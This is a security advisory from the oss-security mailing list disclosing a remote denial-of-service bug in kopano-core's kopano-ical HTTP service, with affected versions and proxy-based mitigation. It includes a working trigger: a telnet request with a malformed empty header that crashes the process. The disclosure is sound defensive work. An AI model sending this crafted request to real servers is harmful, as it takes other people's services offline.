|
|
Message-ID: <op516nqr-96s1-3r69-4np9-314p89o96951@vanv.qr>
Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST)
From: Jan Engelhardt <jengelh@...i.de>
To: oss-security@...ts.openwall.com
Subject: kopano-core 11.0.1.77: Remote DoS with out-of-bounds access
Initial publication, no CVE number yet.
# Affected versions
* kopano-core 11.0.1
* kopano-core 8.7.20
* it is believed this affects all other versions too,
including 10.0.7, 9.1.0, and zarafa 7.2.6.
The "kopano-ical" program implements a network service/trivial HTTP
server. It fails to properly check HTTP headers, and with a crafted
request, can be exploited to drive the process into an exception and
have it terminate.
# Trigger
» ./kopano-ical -F &
» telnet localhost 8000
Trying ::1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Foo:
Connection closed by foreign host.
terminate called after throwing an instance of 'std::out_of_range'
what(): basic_string::substr: __pos (which is 6) > this->size() (which is 5)
# Mitigation
In conjunction with a proxy, the issue does not occur as they often
filter lines (LF->CRLF, giving an extra byte). Tested ones:
nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.